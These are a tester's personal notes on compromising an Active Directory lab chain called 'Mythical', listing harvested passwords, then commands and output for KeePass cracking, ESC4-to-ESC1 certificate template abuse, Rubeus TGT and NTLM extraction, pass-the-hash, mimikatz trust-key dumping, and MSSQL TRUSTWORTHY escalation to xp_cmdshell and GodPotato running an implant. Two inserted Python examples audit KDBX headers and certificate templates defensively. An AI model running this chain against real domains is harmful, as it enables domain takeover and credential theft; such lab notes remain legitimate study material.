Mythical (Chain)
This is not a writeup, just my notes about the machine.

Credentials
| Account | Password | Source | Scope |
| --- | --- | --- | --- |
| mythic_admin | wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX | Provided by Client | Mythical Server |
| domjoin | hKvhexY5BtAgtWAY | Found on Keepass | domain user |
| Keepass Database | 741852 | Cracked from keepass database | Keepass database |
| svc_ldap | osaRXWkDf2y5SGh5 | Disassembly binary | Domain User |
✅ Valid Usernames
Administrator
Guest
krbtgt
Wendy.Adams
William.Jennings
Julie.Khan
Alan.Rhodes
Jay.Little
Owen.Dunn
Howard.Frost
Naomi.Campbell
Judith.Smith
Nicholas.Hill
Karl.Kaur
Hilary.Pearson
Marcus.Elliott
Fiona.Knight
Jay.Miller
Josephine.Smith
Mohammad.Jones
Glen.Price
Amber.Hussain
Megan.Higgins
Donald.Burton
Jasmine.Smith
Kim.Byrne
Jack.Chambers
Danielle.Andrews
svc_ldap
svc_sql
root
🔑 Passwords list
wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX
hKvhexY5BtAgtWAY
741852
osaRXWkDf2y5SGh5
Information Gathering
Nmap Scan
Machine 1
-
Machine 2
22/tcp open ssh
7443/tcp open oracleas-https
Machine 3
-
Compromise DC01 Server
Initial Access

Situational Awareness
OS Name: Microsoft Windows Server 2022 Standard
System Type: x64-based PC
Current User: momo.ayase
MYTHICAL-US\Backup Admins
SeMachineAccountPrivilege (Create Computers)
Domain: mythical-us.vl
FQDN: dc01.mythical-us.vl
No Kerberoastable or AS-REP-roastable users.
Checking the ARP table.
Myhichal > shell arp -a
Interface: 192.168.25.2 --- 0xa
Internet Address Physical Address Type
192.168.25.1 00-ff-5d-3b-65-7a dynamic
192.168.25.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 10.10.154.117 --- 0xe
Internet Address Physical Address Type
10.10.154.113 0a-5c-d9-b1-d6-ef dynamic
10.10.154.118 0a-35-98-7e-25-2b dynamic
10.10.154.119 0a-10-74-82-61-e1 dynamic
10.10.154.127 ff-ff-ff-ff-ff-ff static
169.254.169.250 0a-5c-d9-b1-d6-ef dynamic
169.254.169.254 0a-5c-d9-b1-d6-ef dynamic
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Scanning the internal network
Tool: PortScanner
Myhichal > register_assembly PortScanner.exe
Myhichal > execute_assembly -Assembly PortScanner.exe hosts=192.168.25.1,10.10.154.113,10.10.154.117,10.10.154.118,10.10.154.119,10.10.154.127 ports=21,22,25,53,53,80,110,137,138,139,143,2049,3000,3306,443,464,514,631,636,8080,873,8888,989,135,137,138,139,389,445,464,3268,3269,5000,5900,8000,1433,9389,8443,88
192.168.25.1 : port 22 is open.
192.168.25.1 : port 873 is open.
192.168.25.1 : port 80 is open.
10.10.154.117 : port 53 is open.
10.10.154.117 : port 53 is open.
10.10.154.117 : port 135 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 389 is open.
10.10.154.117 : port 3268 is open.
10.10.154.117 : port 445 is open.
10.10.154.117 : port 3269 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 88 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 636 is open.
10.10.154.117 : port 9389 is open.
10.10.154.118 : port 22 is open.
10.10.154.118 : port 80 is open.
10.10.154.119 : port 53 is open.
10.10.154.119 : port 135 is open.
10.10.154.119 : port 53 is open.
10.10.154.119 : port 389 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 445 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 3268 is open.
10.10.154.119 : port 9389 is open.
10.10.154.119 : port 3269 is open.
10.10.154.119 : port 88 is open.
10.10.154.119 : port 636 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 1433 is open.
Enumerating the rsync service and retrieving a KeePass database
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1
mythical Domain Backups
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1/mythical
receiving incremental file list
drwxr-xr-x 4,096 2024/11/29 08:04:42 .
-rw-r--r-- 37 2024/11/29 07:39:26 flag.txt
-rw-r--r-- 1,605 2024/11/29 07:49:51 it.kdbx
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/flag.txt
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/it.kdbx
File of interest: it.kdbx
Cracking the KeePass database
Attempting to extract the database hash with keepass2john returned "File version '40000' is currently not supported!",
which means this database format is not supported by keepass2john.
❯ keepass2john it.kdbx
! it.kdbx : File version '40000' is currently not supported!
The tester used keepass4brute.sh instead.
#Installing dependencies
❯ sudo apt-get install keepassxc -y
❯ ./keepass4brute.sh it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 950/1556 - Attempts per minute: 105 - Estimated time remaining: 5 minutes, 46 seconds
[+] Current attempt: 741852
[*] Password found: 741852
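As an added example (not from the original notes or from keepass4brute), the following Python reads the unencrypted KDBX 4 outer header to show why keepass2john rejected the file (the version word 0x00040000) and what key-derivation cost a guessing attack against the database faces. The sample header bytes are constructed, and the KDF UUIDs are the well-known identifiers from the KeePass format.

```python
"""Inspect a KeePass KDBX 4 outer header: format version and key-derivation cost.
Added example, not part of the original notes or of keepass4brute. The layout
(signatures, version word, TLV fields, VariantDictionary with the KDF parameters)
follows the public KDBX 4 spec; the sample header below is constructed."""
import struct
import uuid

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67
KDF_NAMES = {"c9d9f39a-628a-4460-bf74-0d08c18a4fea": "AES-KDF",   # well-known KDF UUIDs
             "ef636ddf-8c29-444b-91f7-a9a403e30a0c": "Argon2d",
             "9e298b19-56db-4773-b23d-fc3ec6f0a1e6": "Argon2id"}

def parse_variant_dict(buf):
    """Decode a KDBX 4 VariantDictionary (header field type 11 = KDF parameters)."""
    pos, out = 2, {}                              # skip the 2-byte dictionary version
    while buf[pos] != 0:                          # a 0x00 type byte ends the dictionary
        vtype = buf[pos]
        nlen = struct.unpack_from("<I", buf, pos + 1)[0]
        name = buf[pos + 5:pos + 5 + nlen].decode()
        pos += 5 + nlen
        vlen = struct.unpack_from("<I", buf, pos)[0]
        raw = bytes(buf[pos + 4:pos + 4 + vlen])
        pos += 4 + vlen
        fmt = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}.get(vtype)
        out[name] = struct.unpack(fmt, raw)[0] if fmt else raw
    return out

def inspect_kdbx_header(data):
    """Return version and KDF cost read from the unencrypted outer header."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    if major < 4:                                 # KDBX 3 uses 16-bit field lengths
        raise ValueError(f"KDBX {major}.{minor} header layout not handled here")
    # The version word 0x00040000 is what keepass2john reported as '40000'.
    info, pos = {"version": f"{major}.{minor}"}, 12
    while True:
        ftype = data[pos]
        flen = struct.unpack_from("<I", data, pos + 1)[0]
        field, pos = data[pos + 5:pos + 5 + flen], pos + 5 + flen
        if ftype == 0:                            # end-of-header marker
            return info
        if ftype == 11:                           # KDF parameter dictionary
            p = parse_variant_dict(field)
            info["kdf"] = KDF_NAMES.get(str(uuid.UUID(bytes=p["$UUID"])), "unknown")
            # AES-KDF carries rounds "R"; Argon2 carries iterations "I" and memory "M"
            info["cost"] = ({"rounds": p["R"]} if "R" in p
                            else {"iterations": p["I"], "memory_mib": p["M"] // 2**20})

# Constructed-sample helpers: one VariantDictionary entry, one KDBX 4 header field.
_vd = lambda t, n, v: bytes([t]) + struct.pack("<I", len(n)) + n.encode() + struct.pack("<I", len(v)) + v
_field = lambda t, v: bytes([t]) + struct.pack("<I", len(v)) + v

# Constructed KDBX 4.0 header: cipher-ID placeholder, Argon2d with 2 iterations and 64 MiB.
SAMPLE_KDF = (b"\x00\x01" + _vd(0x42, "$UUID", uuid.UUID(list(KDF_NAMES)[1]).bytes)
              + _vd(0x05, "I", struct.pack("<Q", 2)) + _vd(0x05, "M", struct.pack("<Q", 64 * 2**20))
              + _vd(0x04, "P", struct.pack("<I", 2)) + b"\x00")
SAMPLE_HEADER = (struct.pack("<IIHH", SIG1, SIG2, 0, 4) + _field(2, bytes(16))
                 + _field(11, SAMPLE_KDF) + _field(0, b"\r\n\r\n"))
```

Run `inspect_kdbx_header(open("it.kdbx", "rb").read())` on a real file to see whether the database relies on a low-cost AES-KDF or on Argon2 with substantial memory, which is the difference between a cheap wordlist run and an expensive one.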

Privilege escalation on DC01 via ESC4
Discovering that the user domjoin can use AD CS
During enumeration with BloodHound, the tester found that the user domjoin belongs to the Certificate Service DCOM Access group,
whose members are allowed to connect to Certification Authorities in the enterprise.

Discovering a vulnerable template to ESC4
The users Momo.Ayase and domjoin possess the SeMachineAccountPrivilege, which allows the creation of computer accounts. This privilege, combined with the configuration of a vulnerable certificate template, fulfills all the requirements to carry out an ESC4 attack. Specifically, the certificate template allows members of the MYTHICAL-US\Domain Computers group to enroll for certificates, and the same group holds write rights over the template itself.
mythical > register_assembly Certify.exe
mythical > execute_assembly -Assembly Certify.exe -Arguments find /vulnerable
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mythical-us,DC=vl'
[!] Vulnerable Certificates Templates :
CA Name : dc01.mythical-us.vl\mythical-us-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
Object Control Permissions
Owner : MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteOwner Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteDacl Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
WriteProperty Principals : MYTHICAL-US\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512
MYTHICAL-US\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515
MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
Certify completed in 00:00:13.3001595
Creating a computer account
The tester proceeded to create a computer account, which as a member of Domain Computers holds full control over the Machine template.
mythical > make_token mythical-us.vl\domjoin hKvhexY5BtAgtWAY
mythical > register_assembly Sharpmad.exe
mythical > execute_assembly -Assembly Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword password123
[+] Machine account z3r0 added
Abusing the template (ESC4)
Once the machine account was created, the tester impersonated it and modified the Machine template to make it vulnerable to ESC1.
mythical > make_token mythical-us.vl\z3r0$ password123
mythical > powershell_import PowerView.ps1
mythical > powershell Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl" -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-name-flag'=1} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
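As an added example (not from the original notes or from Certify), the following Python audits a template described in the form Certify prints for the ESC4 condition found above (a low-privileged group with WriteOwner/WriteDacl/WriteProperty) and for the ESC1 condition the Add-DomainObjectAcl and Set-DomainObject calls create (enrollee supplies subject, client-auth EKU, low-privileged enrollment). The two sample templates are constructed from the Machine template shown in these notes before and after the modification; the Domain Users entry with RID 513 is assumed.

```python
"""Audit an AD CS certificate template for ESC1 and ESC4 conditions.
Added example, not part of the original notes or of Certify. It consumes the
template attributes as Certify prints them; the two samples are built from the
Machine template in these notes, before and after the Set-DomainObject changes.
The Domain Users principal (RID 513) is assumed, not taken from the notes."""

LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
# EKUs that permit domain authentication: Client Auth, Smart Card Logon, PKINIT, Any Purpose
AUTH_EKUS = {"Client Authentication", "1.3.6.1.5.5.7.3.2", "Smart Card Logon",
             "1.3.6.1.4.1.311.20.2.2", "PKINIT Client Authentication", "1.3.6.1.5.2.3.4",
             "Any Purpose", "2.5.29.37.0"}
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001          # msPKI-Certificate-Name-Flag bit
CONTROL_RIGHTS = {"Owner", "WriteOwner", "WriteDacl", "WriteProperty", "GenericAll"}

def principal_name(entry):
    """'MYTHICAL-US\\Domain Computers S-1-5-21-...-515' -> 'Domain Computers'."""
    return entry.split(" S-1-5-")[0].split("\\", 1)[-1]

def audit_template(t):
    """Return a list of ESC1/ESC4 findings for one template dict."""
    findings = []
    low_enroll = {principal_name(p) for p in t["enrollment_rights"]} & LOW_PRIV
    if (low_enroll and t["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT
            and (not t["eku"] or set(t["eku"]) & AUTH_EKUS)    # no EKU = any purpose
            and t["signatures_required"] == 0 and not t["manager_approval"]):
        findings.append(f"ESC1: {', '.join(sorted(low_enroll))} can enroll and choose the subject/SAN")
    control = {}
    for right, principals in t["object_control"].items():
        for who in (principal_name(p) for p in principals):
            if right in CONTROL_RIGHTS and who in LOW_PRIV:
                control.setdefault(who, set()).add(right)
    for who, rights in sorted(control.items()):
        findings.append(f"ESC4: {who} has {'/'.join(sorted(rights))} on the template")
    return findings

_ADMINS = ["MYTHICAL-US\\Domain Admins S-1-5-21-614429729-4048209472-3755682007-512",
           "MYTHICAL-US\\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519"]
_COMPUTERS = "MYTHICAL-US\\Domain Computers S-1-5-21-614429729-4048209472-3755682007-515"
_USERS = "MYTHICAL-US\\Domain Users S-1-5-21-614429729-4048209472-3755682007-513"  # assumed

# "Machine" as Certify found it: SUBJECT_ALT_REQUIRE_DNS | SUBJECT_REQUIRE_DNS_AS_CN, no ESC1
MACHINE_BEFORE = {
    "name": "Machine", "name_flag": 0x08000000 | 0x10000000,
    "eku": ["Client Authentication", "Server Authentication"],
    "signatures_required": 0, "manager_approval": False,
    "enrollment_rights": _ADMINS + [_COMPUTERS],
    "object_control": {r: _ADMINS + [_COMPUTERS] for r in ("WriteOwner", "WriteDacl", "WriteProperty")},
}
# "Machine" after the ACL grant and the three Set-DomainObject calls: flag 1, EKU 1.3.6.1.5.5.7.3.2
MACHINE_AFTER = dict(MACHINE_BEFORE, name_flag=1, eku=["1.3.6.1.5.5.7.3.2"],
                     enrollment_rights=MACHINE_BEFORE["enrollment_rights"] + [_USERS])
```

Feeding every template's attributes through audit_template (from LDAP or from Certify output) surfaces both the original ESC4 exposure and the ESC1 state a later modification leaves behind, which is what a periodic template review or a change alert on msPKI-Certificate-Name-Flag should catch.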
Abusing the template (ESC1)
Once the template had been modified from ESC4 to ESC1, the tester requested a certificate with the Administrator account as the alternative name.
mythical > execute_assembly -Assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:Administrator
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : MYTHICAL-US\Momo.Ayase
[*] No subject name specified, using current context as subject.
[*] Template : Machine
[*] Subject : CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] AltName : Administrator
[*] Certificate Authority : dc01.mythical-us.vl\mythical-us-DC01-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 6
[*] cert.pem :
Intrusionz3r0@kali:$ openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Requesting a TGT using the Administrator certificate
Mythical > execute_assembly -Assembly Rubeus.exe asktgt /user:Administrator /certificate:C:\_admin\admin.pfx /getcredentials /nowrap
v2.3.3
[*] Action: Ask TGT
[*] Got domain: mythical-us.vl
[*] Using PKINIT with etype rc4_hmac and subject: CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mythical-us.vl\Administrator'
[*] Using domain controller: fe80::c7e0:a060:1ed5:2f97:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/mythical-us.vl
ServiceRealm : MYTHICAL-US.VL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : MYTHICAL-US.VL
StartTime : 5/9/2025 6:51:06 PM
EndTime : 5/10/2025 4:51:06 AM
RenewTill : 5/16/2025 6:51:06 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 2wCULMc6OnWNq1ytFDzaCA==
ASREP (key) : 1C7C7FA9FF23585C3DEE9FD18F999B04
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : C583EF48C5ED66C727AECB6FAB87AC12
Obtaining a shell as Administrator using pass-the-hash.
mythical > powershell_import Invoke-SMBExec.ps1
mythical > powershell Invoke-SMBExec -Target DC01 -Domain mythical-us.vl -Username Administrator -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command "C:\ProgramData\google\update.exe"

Compromising DC02
Initial Access
Discovering an outbound trust relationship
The tester identified that the domain mythical-us.vl has an outbound trust to mythical-eu.vl, meaning it accepts authentication from users in the mythical-eu.vl domain.
mythical > powershell_import PowerView.ps1
mythical > powershell Get-DomainTrust
SourceName : mythical-us.vl
TargetName : mythical-eu.vl
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Outbound
WhenCreated : 12/3/2024 6:12:53 PM
WhenChanged : 5/10/2025 1:26:04 AM
Obtaining the trust account hashes
Using mimikatz, the tester dumped the trust relationship secrets and recovered the NTLM hash of the trust account MYTHICAL-US$, which is stored within mythical-eu.vl.
mythical > shell C:\Temp\mimikatz.exe privilege::debug "lsadump::trust /patch" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::trust /patch
Current domain: MYTHICAL-US.VL (MYTHICAL-US / S-1-5-21-614429729-4048209472-3755682007)
Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
[ In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL
[ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 5/9/2025 6:26:04 PM - CLEAR - 04 21 4d b3 36 46 d0 51 ed df 29 36 9d e2 8e d3 3e fb 63 51 ba 5f 95 ac b6 8c 14 23 18 d2 0d da 68 de e1 2c 07 26 45 9a 0b 30 e8 06 55 67 93 51 e4 43 2f dc 16 e9 86 33 ba 8a 44 06 52 12 2d aa 67 e0 bd 08 99 9d e9 3d 3a 4b 27 58 1f 12 3d 7f 32 44 e1 81 3c 8e fa 09 4b 17 43 70 dd aa ef 2c df 36 43 d7 27 20 76 18 75 aa 25 9a 95 9f 06 db 84 0b af b0 72 fd 8f 2b 20 ab 50 8d 4a c0 f6 1b 53 d7 83 74 e1 79 0d 4e 2f 9d d6 9a bb 7d 68 2f bc 7d 77 72 ea 04 88 7f 43 5a 1b 18 9a c6 81 96 e3 82 cd 58 28 5c 39 d8 80 8f 6d 99 ee 4f a0 75 29 97 d2 ee 6f 82 03 b8 3d 08 5c a7 14 82 2a 02 f3 15 8f 58 fe b9 63 60 f1 55 ba 6b a9 69 b6 be d8 38 79 5e 3a 18 75 f3 e1 fe 62 7d f5 fb 7f b5 9d e8 4b 36 4e 15 5e 32 63 a1 f0 3a d2 7c e3 bc
* aes256_hmac 1747706d71b79f85f7807a918f8e17ef527dc4834f9e4ea8c95d15b56b3d4785
* aes128_hmac 427fc3a8831a6b64030b368422f038de
* rc4_hmac_nt 5e2ba07271159d53eaa486a65b9a998b
[ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL
[Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
* 5/9/2025 6:26:04 PM - CLEAR - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e
* aes256_hmac cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
* aes128_hmac 652888ee3ab5fac7ea1ebf84e423d59d
* rc4_hmac_nt eb921a2b0e9d626559dab0f54fdc6498
mimikatz(commandline) # exit
Bye!
With this hash, the tester used Rubeus to request a Kerberos TGT on behalf of mythical-us$ from the mythical-eu.vl domain controller:
mythical > execute_assembly -Assembly Rubeus.exe asktgt /domain:mythical-eu.vl /user:mythical-us$ /rc4:5e2ba07271159d53eaa486a65b9a998b /nowrap
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 5e2ba07271159d53eaa486a65b9a998b
[*] Building AS-REQ (w/ preauth) for: 'mythical-eu.vl\mythical-us$'
[*] Using domain controller: 10.10.242.23:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/mythical-eu.vl
ServiceRealm : MYTHICAL-EU.VL
UserName : mythical-us$ (NT_PRINCIPAL)
UserRealm : MYTHICAL-EU.VL
StartTime : 5/9/2025 7:25:32 PM
EndTime : 5/10/2025 5:25:32 AM
RenewTill : 5/16/2025 7:25:32 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : cG3mp95plJ3znW7Ogx3hDw==
ASREP (key) : 5E2BA07271159D53EAA486A65B9A998B
Privilege escalation on DC02
Discovering svc_ldap's plaintext credentials
The tester downloaded getusers.exe and disassembled it for analysis.
Mythical > shell dir \\DC02.mythical-eu.vl\dev
Volume in drive \\DC02.mythical-eu.vl\dev has no label.
Volume Serial Number is CAB5-8F8F
Directory of \\DC02.mythical-eu.vl\dev
11/29/2024 09:02 AM <DIR> .
11/29/2024 09:02 AM 441,224 Autologon64.exe
11/29/2024 09:00 AM 4,608 getusers.exe
2 File(s) 445,832 bytes
1 Dir(s) 9,443,155,968 bytes free
The tester found svc_ldap's plaintext credentials within getusers.exe.

Credentials found: svc_ldap:osaRXWkDf2y5SGh5
Abusing a TRUSTWORTHY database
mythical > make_token -username mythical-eu.vl\svc_sql -password osaRXWkDf2y5SGh5
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT name, database_id, create_date FROM sys.databases;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "CREATE OR ALTER PROCEDURE dbo.z3r0 WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [MYTHICAL-EU\svc_sql];"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC dbo.z3r0;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC sp_configure 'show advanced options', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC xp_cmdshell 'whoami'"
Initial foothold on DC02
mythical > cp c:\ProgramData\Google\Update.exe \\DC02.mythical-eu.vl\dev\update.exe
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC xp_cmdshell 'C:\dev\update.exe'"

Privilege escalation on DC02 via SeImpersonatePrivilege
mythical > cp c:\Temp\GodPotato-NET4.exe \\DC02.mythical-eu.vl\dev\GodPotato-NET4.exe
mythical > shell GodPotato-NET4.exe -cmd c:\dev\update.exe
